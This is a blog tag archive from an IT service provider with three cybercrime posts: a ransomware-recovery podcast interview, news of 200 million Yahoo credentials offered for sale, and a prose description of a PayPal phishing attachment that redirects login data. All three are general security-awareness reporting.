Connect With Us:
Call Us: 951.237.5214 Contact Us

Tag Archives: cybercrime

CyberScoop Radio NeuShield Interview

neushield

How do you fight off a ransomware attack?

A few days ago I was interviewed by Greg Otto from CyberScoop on a subject and company dear to me, NeuShield. Here are some excerpts from their article and also a link to the full interview which was recorded on June 24, 2020.

“Ransomware has been one of the biggest threats in cybersecurity over the past few years. Hospitals, governments, cities, companies, they’ve all been impacted by this wave of malicious behavior.

But what happens when an enterprise is hit? What goes on in the short term? How do you stop the bleeding? How do you recover? On this episode, Greg Otto talks with David Macias, president of ITRMS, an IT service provider based in California. Macias, a victim of a ransomware attack, tells us how he recovered, what he learned, and what he tells his clients to do in order to prevent a similar incident from occurring.”

To hear the full podcast please click on this link.

To read our full article on NeuShield.

Neushield

Hacker Selling 200 Million Yahoo Accounts On The Web

Hacker Selling 200 Million Yahoo Accounts On The Web

Hardly a day goes by without headlines about another data breach. The latest is news about the same hacker who was responsible for selling data for MySpace, LinkedIn, Tumblr and VK.com. There is evidence that this hacker is now selling login information of 200 Million Yahoo users.

The hacker, who goes by the name “Peace,” has uploaded 200 Million Yahoo credentials and is selling them on an underground marketplace called The Real Deal for 3 Bitcoins.

Yahoo has admitted the company was aware of the potential leak, but did not confirm the authenticity of the data as of yet.

The compromised data includes usernames, MD5-hashed passwords and birthdates from 200 Million of so Yahoo users. In some cases, there is also the backup email addresses used for the account, country of origin, as well as the ZIP codes for United States users.

Because the passwords are MD5-encrypted, hackers can easily decrypt them using MD5 decryptors easily available online.

Last week, Verizon acquired Yahoo for $4.8 Billion. The hacker probably decided to monetize the stolen user accounts before the data lost its value.

Although Yahoo has not confirmed the database breach, users are strongly advised to change their passwords. We at IT Resource Management Services recommend passwords longer than 10 characters with a combination of upper, lower, numeric and with special characters and we also strongly advice that passwords be changed every six months. Many companies now offer two-factor authentication for online accounts and we strongly recommend this option. We strongly recommend that you update your passwords immediately, especially if you are using the same password for multiple websites.

Advanced phishing tactics used to steal PayPal credentials

Advanced phishing tactics used to steal PayPal credentials

Posted June 14, 2016 by

Phishers are back to using an old tactic in a new fashion to get hold of their victims’ credentials.

One of the first lessons you will learn during anti-phishing training is to hover over the links in a mail to see if they point to the site where you would expect them to point. Although good advice, this is NOT a guarantee that you are going to be safe.

Always visit sites directly, never follow the URLs presented to you in emails or attachments.

Phishing definition

Per Wikipedia:

Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money), often for malicious reasons, by masquerading as a trustworthy entity in an electronic communication.

What does this phish do?

As reported by UK malware researcher @dvk01uk, the phishers are using Javascript to send the user to the promised PayPal site while the login credentials are being sent to an entirely different domain.

The javascript runs as soon as the page (HTML attachment) is loaded and intercepts all posts to PayPal.com and diverts them to the actual phishing page to accept all your details, if you are unwise enough to fall for this trick.

In this case, the phish was pointing to PayPal and the phishing page is www[dot]egypt-trips[dot]co which appears to be an unused WordPress site. (We have informed the registrant of the phish, so we hope they will take appropriate measures.)

Blocked

While giving the site owner some time to clean up his site, users of Malwarebytes Anti-Malware Premium will find that the phishing page is blocked if they have the Malicious Website Protection enabled.

protection

Pieter Arntz

Let us worry about your IT needs so you can concentrate on your business!